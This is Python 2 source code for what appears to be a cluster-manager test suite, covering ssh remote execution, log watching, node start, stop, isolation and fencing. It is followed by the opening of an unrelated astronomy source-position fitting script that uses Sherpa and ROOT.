self._logfunctions = value
#
# Cluster Manager Class
#
elif key == "CMclass":
if value and not issubclass(value, ClusterManager):
raise ValueError("'CMclass' must be a subclass of"
" ClusterManager")
#
# Initial Random seed...
#
#elif key == "RandSeed":
# if len(value) != 3:
# raise ValueError("'Randseed' must be a 3-element list/tuple")
# for elem in value:
# if not isinstance(elem, types.IntType):
# raise ValueError("'Randseed' list must all be ints")
self.data[key] = value
def IsValidNode(self, node):
'Return TRUE if the given node is valid'
return self.Nodes.has_key(node)
def __CheckNode(self, node):
"Raise a ValueError if the given node isn't valid"
if not self.IsValidNode(node):
raise ValueError("Invalid node [%s] in CheckNode" % node)
def RandomNode(self):
'''Choose a random node from the cluster'''
return self.RandomGen.choice(self["nodes"])
class Logger:
TimeFormat = "%b %d %H:%M:%S\t"
def __call__(self, lines):
raise ValueError("Abstract class member (__call__)")
def write(self, line):
return self(line.rstrip())
def writelines(self, lines):
for s in lines:
self.write(s)
return 1
def flush(self):
return 1
def isatty(self):
return None
class SysLog(Logger):
# http://docs.python.org/lib/module-syslog.html
defaultsource="CTS"
map = {
"kernel": syslog.LOG_KERN,
"user": syslog.LOG_USER,
"mail": syslog.LOG_MAIL,
"daemon": syslog.LOG_DAEMON,
"auth": syslog.LOG_AUTH,
"lpr": syslog.LOG_LPR,
"news": syslog.LOG_NEWS,
"uucp": syslog.LOG_UUCP,
"cron": syslog.LOG_CRON,
"local0": syslog.LOG_LOCAL0,
"local1": syslog.LOG_LOCAL1,
"local2": syslog.LOG_LOCAL2,
"local3": syslog.LOG_LOCAL3,
"local4": syslog.LOG_LOCAL4,
"local5": syslog.LOG_LOCAL5,
"local6": syslog.LOG_LOCAL6,
"local7": syslog.LOG_LOCAL7,
}
def __init__(self, labinfo):
if labinfo.has_key("syslogsource"):
self.source=labinfo["syslogsource"]
else:
self.source=SysLog.defaultsource
self.facility="daemon"
if labinfo.has_key("SyslogFacility") and labinfo["SyslogFacility"]:
if SysLog.map.has_key(labinfo["SyslogFacility"]):
self.facility=labinfo["SyslogFacility"]
else:
raise ValueError("%s: bad syslog facility"%labinfo["SyslogFacility"])
self.facility=SysLog.map[self.facility]
syslog.openlog(self.source, 0, self.facility)
def setfacility(self, facility):
self.facility = facility
if SysLog.map.has_key(self.facility):
self.facility=SysLog.map[self.facility]
syslog.closelog()
syslog.openlog(self.source, 0, self.facility)
def __call__(self, lines):
if isinstance(lines, types.StringType):
syslog.syslog(lines)
else:
for line in lines:
syslog.syslog(line)
def name(self):
return "Syslog"
class StdErrLog(Logger):
def __init__(self, labinfo):
pass
def __call__(self, lines):
t = time.strftime(Logger.TimeFormat, time.localtime(time.time()))
if isinstance(lines, types.StringType):
sys.__stderr__.writelines([t, lines, "\n"])
else:
for line in lines:
sys.__stderr__.writelines([t, line, "\n"])
sys.__stderr__.flush()
def name(self):
return "StdErrLog"
class FileLog(Logger):
def __init__(self, labinfo, filename=None):
if filename == None:
filename=labinfo["LogFileName"]
self.logfile=filename
import os
self.hostname = os.uname()[1]+" "
self.source = "CTS: "
def __call__(self, lines):
fd = open(self.logfile, "a")
t = time.strftime(Logger.TimeFormat, time.localtime(time.time()))
if isinstance(lines, types.StringType):
fd.writelines([t, self.hostname, self.source, lines, "\n"])
else:
for line in lines:
fd.writelines([t, self.hostname, self.source, line, "\n"])
fd.close()
def name(self):
return "FileLog"
class RemoteExec:
'''This is an abstract remote execution class. It runs a command on another
machine - somehow. The somehow is up to us. This particular
class uses ssh.
Most of the work is done by fork/exec of ssh or scp.
'''
def __init__(self, Env=None, silent=False):
self.Env = Env
self.silent = silent
# -n: no stdin, -x: no X11,
# -o ServerAliveInterval=5 disconnect after 3*5s if the server stops responding
self.Command = "ssh -l root -n -x -o ServerAliveInterval=5 -o ConnectTimeout=10 -o TCPKeepAlive=yes -o ServerAliveCountMax=3 "
# -B: batch mode, -q: no stats (quiet)
self.CpCommand = "scp -B -q"
self.OurNode=string.lower(os.uname()[1])
def enable_qarsh(self):
# http://nstraz.wordpress.com/2008/12/03/introducing-qarsh/
self.log("Using QARSH for connections to cluster nodes")
self.Command = "qarsh -t 300 -l root"
self.CpCommand = "qacp -q"
def _fixcmd(self, cmd):
return re.sub("\'", "'\\''", cmd)
def _cmd(self, *args):
'''Compute the string that will run the given command on the
given remote system'''
args= args[0]
sysname = args[0]
command = args[1]
#print "sysname: %s, us: %s" % (sysname, self.OurNode)
if sysname == None or string.lower(sysname) == self.OurNode or sysname == "localhost":
ret = command
else:
ret = self.Command + " " + sysname + " '" + self._fixcmd(command) + "'"
#print ("About to run %s\n" % ret)
return ret
def log(self, args):
if not self.silent:
if not self.Env:
print (args)
else:
self.Env.log(args)
def debug(self, args):
if not self.silent:
if not self.Env:
print (args)
else:
self.Env.debug(args)
def __call__(self, node, command, stdout=0, synchronous=1, silent=False, blocking=True):
'''Run the given command on the given remote system
If you call this class like a function, this is the function that gets
called. It just runs it roughly as though it were a system() call
on the remote machine. The first argument is name of the machine to
run it on.
'''
rc = 0
result = None
if not synchronous:
proc = Popen(self._cmd([node, command]),
stdout = PIPE, stderr = PIPE, close_fds = True, shell = True)
if not silent: self.debug("cmd: async: target=%s, rc=%d: %s" % (node, proc.pid, command))
if proc.pid > 0:
return 0
return -1
proc = Popen(self._cmd([node, command]),
stdout = PIPE, stderr = PIPE, close_fds = True, shell = True)
#if not blocking:
# fcntl.fcntl(proc.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
if proc.stdout:
if stdout == 1:
result = proc.stdout.readline()
else:
result = proc.stdout.readlines()
proc.stdout.close()
else:
self.log("No stdout stream")
rc = proc.wait()
if not silent: self.debug("cmd: target=%s, rc=%d: %s" % (node, rc, command))
if stdout == 1:
return result
if proc.stderr:
errors = proc.stderr.readlines()
proc.stderr.close()
if not silent:
for err in errors:
self.debug("cmd: stderr: %s" % err)
if stdout == 0:
if not silent and result:
for line in result:
self.debug("cmd: stdout: %s" % line)
return rc
return (rc, result)
def cp(self, source, target, silent=False):
'''Perform a remote copy'''
cpstring = self.CpCommand + " \'" + source + "\'" + " \'" + target + "\'"
rc = os.system(cpstring)
if not silent: self.debug("cmd: rc=%d: %s" % (rc, cpstring))
return rc
has_log_watcher = {}
log_watcher_bin = "/tmp/cts_log_watcher.py"
log_watcher = """
import sys, os, fcntl
'''
Remote logfile reader for CTS
Reads a specified number of lines from the supplied offset
Returns the current offset
Contains logic for handling truncation
'''
limit = 0
offset = 0
prefix = ''
filename = '/var/log/messages'
skipthis=None
args=sys.argv[1:]
for i in range(0, len(args)):
if skipthis:
skipthis=None
continue
elif args[i] == '-l' or args[i] == '--limit':
skipthis=1
limit = int(args[i+1])
elif args[i] == '-f' or args[i] == '--filename':
skipthis=1
filename = args[i+1]
elif args[i] == '-o' or args[i] == '--offset':
skipthis=1
offset = args[i+1]
elif args[i] == '-p' or args[i] == '--prefix':
skipthis=1
prefix = args[i+1]
logfile=open(filename, 'r')
logfile.seek(0, os.SEEK_END)
newsize=logfile.tell()
if offset != 'EOF':
offset = int(offset)
if newsize >= offset:
logfile.seek(offset)
else:
print prefix + ('File truncated from %d to %d' % (offset, newsize))
if (newsize*1.05) < offset:
logfile.seek(0)
# else: we probably just lost a few logs after a fencing op
# continue from the new end
# TODO: accept a timestamp and discard all messages older than it
# Don't block when we reach EOF
fcntl.fcntl(logfile.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
count = 0
while True:
if logfile.tell() >= newsize: break
elif limit and count >= limit: break
line = logfile.readline()
if not line: break
print line.strip()
count += 1
print prefix + 'Last read: %d, limit=%d, count=%d' % (logfile.tell(), limit, count)
logfile.close()
"""
class SearchObj:
def __init__(self, Env, filename, host=None):
self.Env = Env
self.host = host
self.filename = filename
self.cache = []
self.offset = "EOF"
if host == None:
host = "localhost"
global has_log_watcher
if not has_log_watcher.has_key(host):
global log_watcher
global log_watcher_bin
self.debug("Installing %s on %s" % (log_watcher_bin, host))
self.Env.rsh(host, '''echo "%s" > %s''' % (log_watcher, log_watcher_bin), silent=True)
has_log_watcher[host] = 1
self.next()
def __str__(self):
if self.host:
return "%s:%s" % (self.host, self.filename)
return self.filename
def log(self, args):
message = "lw: %s: %s" % (self, args)
if not self.Env:
print (message)
else:
self.Env.log(message)
def debug(self, args):
message = "lw: %s: %s" % (self, args)
if not self.Env:
print (message)
else:
self.Env.debug(message)
def next(self):
cache = []
if not len(self.cache):
global log_watcher_bin
(rc, lines) = self.Env.rsh(
self.host,
"python %s -p CTSwatcher: -f %s -o %s" % (log_watcher_bin, self.filename, self.offset),
stdout=None, silent=True, blocking=False)
for line in lines:
match = re.search("^CTSwatcher:Last read: (\d+)", line)
if match:
last_offset = self.offset
self.offset = match.group(1)
#if last_offset == "EOF": self.debug("Got %d lines, new offset: %s" % (len(lines), self.offset))
elif re.search("^CTSwatcher:.*truncated", line):
self.log(line)
elif re.search("^CTSwatcher:", line):
self.debug("Got control line: "+ line)
else:
cache.append(line)
return cache
class LogWatcher(RemoteExec):
'''This class watches logs for messages that fit certain regular
expressions. Watching logs for events isn't the ideal way
to do business, but it's better than nothing :-)
On the other hand, this class is really pretty cool ;-)
The way you use this class is as follows:
Construct a LogWatcher object
Call setwatch() when you want to start watching the log
Call look() to scan the log looking for the patterns
'''
def __init__(self, Env, log, regexes, name="Anon", timeout=10, debug_level=None, silent=False):
'''This is the constructor for the LogWatcher class. It takes a
log name to watch, and a list of regular expressions to watch for."
'''
RemoteExec.__init__(self, Env)
# Validate our arguments. Better sooner than later ;-)
for regex in regexes:
assert re.compile(regex)
self.name = name
self.regexes = regexes
self.filename = log
self.debug_level = debug_level
self.whichmatch = -1
self.unmatched = None
self.file_list = []
self.line_cache = []
if not silent:
for regex in self.regexes:
self.debug("Looking for regex: "+regex)
self.Timeout = int(timeout)
self.returnonlymatch = None
def debug(self, args):
message = "lw: %s: %s" % (self.name, args)
if not self.Env:
print (message)
else:
self.Env.debug(message)
def setwatch(self):
'''Mark the place to start watching the log from.
'''
if self.Env["LogWatcher"] == "remote":
for node in self.Env["nodes"]:
self.file_list.append(SearchObj(self.Env, self.filename, node))
else:
self.file_list.append(SearchObj(self.Env, self.filename))
def __del__(self):
if self.debug_level > 1: self.debug("Destroy")
def ReturnOnlyMatch(self, onlymatch=1):
'''Specify one or more subgroups of the match to return rather than the whole string
http://www.python.org/doc/2.5.2/lib/match-objects.html
'''
self.returnonlymatch = onlymatch
def __get_lines(self):
if not len(self.file_list):
raise ValueError("No sources to read from")
for f in self.file_list:
lines = f.next()
if len(lines):
self.line_cache.extend(lines)
def look(self, timeout=None, silent=False):
'''Examine the log looking for the given patterns.
It starts looking from the place marked by setwatch().
This function looks in the file in the fashion of tail -f.
It properly recovers from log file truncation, but not from
removing and recreating the log. It would be nice if it
recovered from this as well :-)
We return the first line which matches any of our patterns.
'''
if timeout == None: timeout = self.Timeout
lines=0
begin=time.time()
end=begin+timeout+1
if self.debug_level > 2: self.debug("starting single search: timeout=%d, begin=%d, end=%d" % (timeout, begin, end))
self.__get_lines()
while True:
if len(self.line_cache):
lines += 1
line = self.line_cache[0]
self.line_cache.remove(line)
which=-1
if re.search("CTS:", line):
continue
if self.debug_level > 2: self.debug("Processing: "+ line)
for regex in self.regexes:
which=which+1
if self.debug_level > 2: self.debug("Comparing line to: "+ regex)
#matchobj = re.search(string.lower(regex), string.lower(line))
matchobj = re.search(regex, line)
if matchobj:
self.whichmatch=which
if self.returnonlymatch:
return matchobj.group(self.returnonlymatch)
else:
self.debug("Matched: "+line)
if self.debug_level > 1: self.debug("With: "+ regex)
return line
elif timeout > 0 and end > time.time():
time.sleep(1)
self.__get_lines()
elif timeout > 0:
# Grab any relevant messages that might have arrived since
# the last time the buffer was populated
self.__get_lines()
# Don't come back here again
timeout = 0
else:
self.debug("Single search terminated: start=%d, end=%d, now=%d, lines=%d" % (begin, end, time.time(), lines))
return None
self.debug("How did we get here")
return None
def lookforall(self, timeout=None, allow_multiple_matches=None, silent=False):
'''Examine the log looking for ALL of the given patterns.
It starts looking from the place marked by setwatch().
We return when the timeout is reached, or when we have found
ALL of the regexes that were part of the watch
'''
if timeout == None: timeout = self.Timeout
save_regexes = self.regexes
returnresult = []
if not silent:
self.debug("starting search: timeout=%d" % timeout)
for regex in self.regexes:
if self.debug_level > 2: self.debug("Looking for regex: "+regex)
while (len(self.regexes) > 0):
oneresult = self.look(timeout)
if not oneresult:
self.unmatched = self.regexes
self.matched = returnresult
self.regexes = save_regexes
return None
returnresult.append(oneresult)
if not allow_multiple_matches:
del self.regexes[self.whichmatch]
else:
# Allow multiple regexes to match a single line
tmp_regexes = self.regexes
self.regexes = []
which = 0
for regex in tmp_regexes:
matchobj = re.search(regex, oneresult)
if not matchobj:
self.regexes.append(regex)
self.unmatched = None
self.matched = returnresult
self.regexes = save_regexes
return returnresult
class NodeStatus:
def __init__(self, Env):
self.Env = Env
def IsNodeBooted(self, node):
'''Return TRUE if the given node is booted (responds to pings)'''
return self.Env.rsh("localhost", "ping -nq -c1 -w1 %s" % node, silent=True) == 0
def IsSshdUp(self, node):
rc = self.Env.rsh(node, "true", silent=True)
return rc == 0
def WaitForNodeToComeUp(self, node, Timeout=300):
'''Return TRUE when given node comes up, or None/FALSE if timeout'''
timeout=Timeout
anytimeouts=0
while timeout > 0:
if self.IsNodeBooted(node) and self.IsSshdUp(node):
if anytimeouts:
# Fudge to wait for the system to finish coming up
time.sleep(30)
self.Env.debug("Node %s now up" % node)
return 1
time.sleep(30)
if (not anytimeouts):
self.Env.debug("Waiting for node %s to come up" % node)
anytimeouts=1
timeout = timeout - 1
self.Env.log("%s did not come up within %d tries" % (node, Timeout))
answer = raw_input('Continue? [nY]')
if answer and answer == "n":
raise ValueError("%s did not come up within %d tries" % (node, Timeout))
def WaitForAllNodesToComeUp(self, nodes, timeout=300):
'''Return TRUE when all nodes come up, or FALSE if timeout'''
for node in nodes:
if not self.WaitForNodeToComeUp(node, timeout):
return None
return 1
class ClusterManager(UserDict):
'''The Cluster Manager class.
This is an subclass of the Python dictionary class.
(this is because it contains lots of {name,value} pairs,
not because it's behavior is that terribly similar to a
dictionary in other ways.)
This is an abstract class which class implements high-level
operations on the cluster and/or its cluster managers.
Actual cluster managers classes are subclassed from this type.
One of the things we do is track the state we think every node should
be in.
'''
def __InitialConditions(self):
#if os.geteuid() != 0:
# raise ValueError("Must Be Root!")
None
def _finalConditions(self):
for key in self.keys():
if self[key] == None:
raise ValueError("Improper derivation: self[" + key
+ "] must be overridden by subclass.")
def __init__(self, Environment, randseed=None):
self.Env = Environment
self.__InitialConditions()
self.clear_cache = 0
self.TestLoggingLevel=0
self.data = {
"up" : "up", # Status meaning up
"down" : "down", # Status meaning down
"StonithCmd" : "stonith -t baytech -p '10.10.10.100 admin admin' %s",
"DeadTime" : 30, # Max time to detect dead node...
"StartTime" : 90, # Max time to start up
#
# These next values need to be overridden in the derived class.
#
"Name" : None,
"StartCmd" : None,
"StopCmd" : None,
"StatusCmd" : None,
#"RereadCmd" : None,
"BreakCommCmd" : None,
"FixCommCmd" : None,
#"TestConfigDir" : None,
"LogFileName" : None,
#"Pat:Master_started" : None,
#"Pat:Slave_started" : None,
"Pat:We_stopped" : None,
"Pat:They_stopped" : None,
"BadRegexes" : None, # A set of "bad news" regexes
# to apply to the log
}
self.rsh = self.Env.rsh
self.ShouldBeStatus={}
self.ns = NodeStatus(self.Env)
self.OurNode=string.lower(os.uname()[1])
def key_for_node(self, node):
return node
def errorstoignore(self):
'''Return list of errors which are 'normal' and should be ignored'''
return []
def log(self, args):
self.Env.log(args)
def debug(self, args):
self.Env.debug(args)
def prepare(self):
'''Finish the Initialization process. Prepare to test...'''
for node in self.Env["nodes"]:
if self.StataCM(node):
self.ShouldBeStatus[node]="up"
else:
self.ShouldBeStatus[node]="down"
self.unisolate_node(node)
def upcount(self):
'''How many nodes are up?'''
count=0
for node in self.Env["nodes"]:
if self.ShouldBeStatus[node]=="up":
count=count+1
return count
def install_helper(self, filename, nodes=None):
file_with_path="%s/%s" % (CTSvars.CTS_home, filename)
if not nodes:
nodes = self.Env["nodes"]
self.debug("Installing %s to %s on %s" % (filename, CTSvars.CTS_home, repr(self.Env["nodes"])))
for node in nodes:
self.rsh(node, "mkdir -p %s" % CTSvars.CTS_home)
self.rsh.cp(file_with_path, "root@%s:%s" % (node, file_with_path))
return file_with_path
def install_config(self, node):
return None
def clear_all_caches(self):
if self.clear_cache:
for node in self.Env["nodes"]:
if self.ShouldBeStatus[node] == "down":
self.debug("Removing cache file on: "+node)
self.rsh(node, "rm -f "+CTSvars.HA_VARLIBHBDIR+"/hostcache")
else:
self.debug("NOT Removing cache file on: "+node)
def prepare_fencing_watcher(self, node):
# If we don't have quorum now but get it as a result of starting this node,
# then a bunch of nodes might get fenced
if self.HasQuorum(None):
return None
if not self.has_key("Pat:They_fenced"):
return None
if not self.has_key("Pat:They_fenced_offset"):
return None
stonith = None
stonithPats = []
for peer in self.Env["nodes"]:
if peer != node and self.ShouldBeStatus[peer] != "up":
stonithPats.append(self["Pat:They_fenced"] % peer)
# Look for STONITH ops, depending on Env["at-boot"] we might need to change the nodes status
stonith = LogWatcher(self.Env, self["LogFileName"], stonithPats, "StartaCM", 0)
stonith.setwatch()
return stonith
def fencing_cleanup(self, node, stonith):
peer_list = []
# If we just started a node, we may now have quorum (and permission to fence)
# Make sure everyone is online before continuing
self.ns.WaitForAllNodesToComeUp(self.Env["nodes"])
if not stonith:
return peer_list
if not self.HasQuorum(None) and len(self.Env["nodes"]) > 2:
# We didn't gain quorum - we shouldn't have shot anyone
return peer_list
# Now see if any states need to be updated
self.debug("looking for: " + repr(stonith.regexes))
shot = stonith.look(0)
while shot:
line = repr(shot)
self.debug("Found: "+ line)
# Extract node name
start = line.find(self["Pat:They_fenced_offset"]) + len(self["Pat:They_fenced_offset"])
peer = line[start:].split("' ")[0]
self.debug("Found peer: "+ peer)
peer_list.append(peer)
self.ShouldBeStatus[peer]="down"
self.log(" Peer %s was fenced as a result of %s starting" % (peer, node))
# Get the next one
shot = stonith.look(60)
# Poll until it comes up
if self.Env["at-boot"]:
if not self.StataCM(peer):
time.sleep(self["StartTime"])
if not self.StataCM(peer):
self.log("ERROR: Peer %s failed to restart after being fenced" % peer)
return None
self.ShouldBeStatus[peer]="up"
return peer_list
def StartaCM(self, node, verbose=False):
'''Start up the cluster manager on a given node'''
if verbose: self.log("Starting %s on node %s" %(self["Name"], node))
else: self.debug("Starting %s on node %s" %(self["Name"], node))
ret = 1
if not self.ShouldBeStatus.has_key(node):
self.ShouldBeStatus[node] = "down"
if self.ShouldBeStatus[node] != "down":
return 1
patterns = []
# Technically we should always be able to notice ourselves starting
patterns.append(self["Pat:Local_started"] % node)
if self.upcount() == 0:
patterns.append(self["Pat:Master_started"] % node)
else:
patterns.append(self["Pat:Slave_started"] % node)
watch = LogWatcher(
self.Env, self["LogFileName"], patterns, "StartaCM", self["StartTime"]+10)
watch.setwatch()
self.install_config(node)
self.ShouldBeStatus[node] = "any"
if self.StataCM(node) and self.cluster_stable(self["DeadTime"]):
self.log ("%s was already started" %(node))
return 1
# Clear out the host cache so autojoin can be exercised
if self.clear_cache:
self.debug("Removing cache file on: "+node)
self.rsh(node, "rm -f "+CTSvars.HA_VARLIBHBDIR+"/hostcache")
if not(self.Env["valgrind-tests"]):
startCmd = self["StartCmd"]
else:
if self.Env["valgrind-prefix"]:
prefix = self.Env["valgrind-prefix"]
else:
prefix = "cts"
startCmd = """G_SLICE=always-malloc HA_VALGRIND_ENABLED='%s' VALGRIND_OPTS='%s --log-file=/tmp/%s-%s.valgrind' %s""" % (
self.Env["valgrind-procs"], self.Env["valgrind-opts"], prefix, """%p""", self["StartCmd"])
stonith = self.prepare_fencing_watcher(node)
if self.rsh(node, startCmd) != 0:
self.log ("Warn: Start command failed on node %s" %(node))
return None
self.ShouldBeStatus[node]="up"
watch_result = watch.lookforall()
self.fencing_cleanup(node, stonith)
if watch.unmatched:
for regex in watch.unmatched:
self.log ("Warn: Startup pattern not found: %s" %(regex))
if watch_result and self.cluster_stable(self["DeadTime"]):
#self.debug("Found match: "+ repr(watch_result))
return 1
elif self.StataCM(node) and self.cluster_stable(self["DeadTime"]):
return 1
self.log ("Warn: Start failed for node %s" %(node))
return None
def StartaCMnoBlock(self, node, verbose=False):
'''Start up the cluster manager on a given node with none-block mode'''
if verbose: self.log("Starting %s on node %s" %(self["Name"], node))
else: self.debug("Starting %s on node %s" %(self["Name"], node))
# Clear out the host cache so autojoin can be exercised
if self.clear_cache:
self.debug("Removing cache file on: "+node)
self.rsh(node, "rm -f "+CTSvars.HA_VARLIBHBDIR+"/hostcache")
if not(self.Env["valgrind-tests"]):
startCmd = self["StartCmd"]
else:
if self.Env["valgrind-prefix"]:
prefix = self.Env["valgrind-prefix"]
else:
prefix = "cts"
startCmd = """G_SLICE=always-malloc HA_VALGRIND_ENABLED='%s' VALGRIND_OPTS='%s --log-file=/tmp/%s-%s.valgrind' %s""" % (
self.Env["valgrind-procs"], self.Env["valgrind-opts"], prefix, """%p""", self["StartCmd"])
self.rsh(node, startCmd, synchronous=0)
self.ShouldBeStatus[node]="up"
return 1
def StopaCM(self, node, verbose=False):
'''Stop the cluster manager on a given node'''
if verbose: self.log("Stopping %s on node %s" %(self["Name"], node))
else: self.debug("Stopping %s on node %s" %(self["Name"], node))
if self.ShouldBeStatus[node] != "up":
return 1
if self.rsh(node, self["StopCmd"]) == 0:
# Make sure we can continue even if corosync leaks
self.rsh(node, "rm -f /dev/shm/fdata-*")
self.ShouldBeStatus[node]="down"
self.cluster_stable(self["DeadTime"])
return 1
else:
self.log ("Could not stop %s on node %s" %(self["Name"], node))
return None
def StopaCMnoBlock(self, node):
'''Stop the cluster manager on a given node with none-block mode'''
self.debug("Stopping %s on node %s" %(self["Name"], node))
self.rsh(node, self["StopCmd"], synchronous=0)
self.ShouldBeStatus[node]="down"
return 1
def cluster_stable(self, timeout = None):
time.sleep(self["StableTime"])
return 1
def node_stable(self, node):
return 1
def RereadCM(self, node):
'''Force the cluster manager on a given node to reread its config
This may be a no-op on certain cluster managers.
'''
rc=self.rsh(node, self["RereadCmd"])
if rc == 0:
return 1
else:
self.log ("Could not force %s on node %s to reread its config"
% (self["Name"], node))
return None
def StataCM(self, node):
'''Report the status of the cluster manager on a given node'''
out=self.rsh(node, self["StatusCmd"], 1)
ret= (string.find(out, 'stopped') == -1)
try:
if ret:
if self.ShouldBeStatus[node] == "down":
self.log(
"Node status for %s is %s but we think it should be %s"
% (node, "up", self.ShouldBeStatus[node]))
else:
if self.ShouldBeStatus[node] == "up":
self.log(
"Node status for %s is %s but we think it should be %s"
% (node, "down", self.ShouldBeStatus[node]))
except KeyError: pass
if ret: self.ShouldBeStatus[node]="up"
else: self.ShouldBeStatus[node]="down"
return ret
def startall(self, nodelist=None, verbose=False):
'''Start the cluster manager on every node in the cluster.
We can do it on a subset of the cluster if nodelist is not None.
'''
ret = 1
map = {}
if not nodelist:
nodelist=self.Env["nodes"]
for node in nodelist:
if self.ShouldBeStatus[node] == "down":
if not self.StartaCM(node, verbose=verbose):
ret = 0
return ret
def stopall(self, nodelist=None, verbose=False):
'''Stop the cluster managers on every node in the cluster.
We can do it on a subset of the cluster if nodelist is not None.
'''
ret = 1
map = {}
if not nodelist:
nodelist=self.Env["nodes"]
for node in self.Env["nodes"]:
if self.ShouldBeStatus[node] == "up":
if not self.StopaCM(node, verbose=verbose):
ret = 0
return ret
def rereadall(self, nodelist=None):
'''Force the cluster managers on every node in the cluster
to reread their config files. We can do it on a subset of the
cluster if nodelist is not None.
'''
map = {}
if not nodelist:
nodelist=self.Env["nodes"]
for node in self.Env["nodes"]:
if self.ShouldBeStatus[node] == "up":
self.RereadCM(node)
def statall(self, nodelist=None):
'''Return the status of the cluster managers in the cluster.
We can do it on a subset of the cluster if nodelist is not None.
'''
result={}
if not nodelist:
nodelist=self.Env["nodes"]
for node in nodelist:
if self.StataCM(node):
result[node] = "up"
else:
result[node] = "down"
return result
def isolate_node(self, target, nodes=None):
'''isolate the communication between the nodes'''
if not nodes:
nodes = self.Env["nodes"]
for node in nodes:
if node != target:
rc = self.rsh(target, self["BreakCommCmd"] % self.key_for_node(node))
if rc != 0:
self.log("Could not break the communication between %s and %s: %d" % (target, node, rc))
return None
else:
self.debug("Communication cut between %s and %s" % (target, node))
return 1
def unisolate_node(self, target, nodes=None):
'''fix the communication between the nodes'''
if not nodes:
nodes = self.Env["nodes"]
for node in nodes:
if node != target:
restored = 0
# Limit the amount of time we have asynchronous connectivity for
# Restore both sides as simultaneously as possible
self.rsh(target, self["FixCommCmd"] % self.key_for_node(node), synchronous=0)
self.rsh(node, self["FixCommCmd"] % self.key_for_node(target), synchronous=0)
self.debug("Communication restored between %s and %s" % (target, node))
def reducecomm_node(self,node):
'''reduce the communication between the nodes'''
rc = self.rsh(node, self["ReduceCommCmd"]%(self.Env["XmitLoss"],self.Env["RecvLoss"]))
if rc == 0:
return 1
else:
self.log("Could not reduce the communication between the nodes from node: %s" % node)
return None
def restorecomm_node(self,node):
'''restore the saved communication between the nodes'''
rc = 0
if float(self.Env["XmitLoss"])!=0 or float(self.Env["RecvLoss"])!=0 :
rc = self.rsh(node, self["RestoreCommCmd"]);
if rc == 0:
return 1
else:
self.log("Could not restore the communication between the nodes from node: %s" % node)
return None
def HasQuorum(self, node_list):
"Return TRUE if the cluster currently has quorum"
# If we are auditing a partition, then one side will
# have quorum and the other not.
# So the caller needs to tell us which we are checking
# If no value for node_list is specified... assume all nodes
raise ValueError("Abstract Class member (HasQuorum)")
def Components(self):
raise ValueError("Abstract Class member (Components)")
def oprofileStart(self, node=None):
if not node:
for n in self.Env["oprofile"]:
self.oprofileStart(n)
elif node in self.Env["oprofile"]:
self.debug("Enabling oprofile on %s" % node)
self.rsh(node, "opcontrol --init")
self.rsh(node, "opcontrol --setup --no-vmlinux --separate=lib --callgraph=20 --image=all")
self.rsh(node, "opcontrol --start")
self.rsh(node, "opcontrol --reset")
def oprofileSave(self, test, node=None):
if not node:
for n in self.Env["oprofile"]:
self.oprofileSave(test, n)
elif node in self.Env["oprofile"]:
self.rsh(node, "opcontrol --dump")
self.rsh(node, "opcontrol --save=cts.%d" % test)
# Read back with: opreport -l session:cts.0 image:/usr/lib/heartbeat/c*
if None:
self.rsh(node, "opcontrol --reset")
else:
self.oprofileStop(node)
self.oprofileStart(node)
def oprofileStop(self, node=None):
if not node:
for n in self.Env["oprofile"]:
self.oprofileStop(n)
elif node in self.Env["oprofile"]:
self.debug("Stopping oprofile on %s" % node)
self.rsh(node, "opcontrol --reset")
self.rsh(node, "opcontrol --shutdown 2>&1 > /dev/null")
class Resource:
'''
This is an HA resource (not a resource group).
A resource group is just an ordered list of Resource objects.
'''
def __init__(self, cm, rsctype=None, instance=None):
self.CM = cm
self.ResourceType = rsctype
self.Instance = instance
self.needs_quorum = 1
def Type(self):
return self.ResourceType
def Instance(self, nodename):
return self.Instance
def IsRunningOn(self, nodename):
'''
This member function returns true if our resource is running
on the given node in the cluster.
It is analagous to the "status" operation on SystemV init scripts and
heartbeat scripts. FailSafe calls it the "exclusive" operation.
'''
raise ValueError("Abstract Class member (IsRunningOn)")
return None
def IsWorkingCorrectly(self, nodename):
'''
This member function returns true if our resource is operating
correctly on the given node in the cluster.
Heartbeat does not require this operation, but it might be called
the Monitor operation, which is what FailSafe calls it.
For remotely monitorable resources (like IP addresses), they *should*
be monitored remotely for testing.
'''
raise ValueError("Abstract Class member (IsWorkingCorrectly)")
return None
def Start(self, nodename):
'''
This member function starts or activates the resource.
'''
raise ValueError("Abstract Class member (Start)")
return None
def Stop(self, nodename):
'''
This member function stops or deactivates the resource.
'''
raise ValueError("Abstract Class member (Stop)")
return None
def __repr__(self):
if (self.Instance and len(self.Instance) > 1):
return "{" + self.ResourceType + "::" + self.Instance + "}"
else:
return "{" + self.ResourceType + "}"
class Component:
def kill(self, node):
None
class Process(Component):
def __init__(self, cm, name, process=None, dc_only=0, pats=[], dc_pats=[], badnews_ignore=[], triggersreboot=0):
self.name = str(name)
self.dc_only = dc_only
self.pats = pats
self.dc_pats = dc_pats
self.CM = cm
self.badnews_ignore = badnews_ignore
self.triggersreboot = triggersreboot
if process:
self.proc = str(process)
else:
self.proc = str(name)
self.KillCmd = "killall -9 " + self.proc
def kill(self, node):
if self.CM.rsh(node, self.KillCmd) != 0:
self.CM.log ("ERROR: Kill %s failed on node %s" %(self.name,node))
return None
return 1
|
12,442 | 9802e47b10102d329ebfb007f714b8ab4586af9a | __author__ = 'Sajan Kumar'
# These are the libraries you need for doing the source fitting analysis
# Essentially you need root pyroot and Sherpa package
import numpy as np
from matplotlib import pyplot as plt
from sherpa.fit import Fit
from sherpa import models
from sherpa.data import Data1D, Data2D
from sherpa.stats import Cash, CStat
from sherpa.estmethods import Confidence
from sherpa import optmethods
import sys
sys.path.append("/Users/kumar/research/software/root_install/root_build_6.14.00/lib")
import ROOT
import matplotlib.lines
import matplotlib.patches as patches
import sherpa.astro.models as md
from MathFunction import *
from sherpa.plot import RegionProjection
from sherpa.plot import IntervalProjection
# --------------------------------------------------------------
class VSourcePositionFitting(object):
def __init__(self, dir, filename):
self.datafile = str(dir) + "/" + str(filename)
def readEDFile(self):
self.Rfile = ROOT.TFile(self.datafile, "read")
tRunsummary = self.Rfile.Get("total_1/stereo/tRunSummary")
crval1, crval2 = [], []
for i, events in enumerate(tRunsummary):
crval1.append(events.SkyMapCentreRAJ2000)
crval2.append(events.SkyMapCentreDecJ2000)
self.Ra = crval1[0]
self.Dec = crval2[0]
# return self.Ra, self.Dec
def extract_data(self, hmap, deg=0.3):
xbinlow = hmap.GetXaxis().FindBin(-deg)
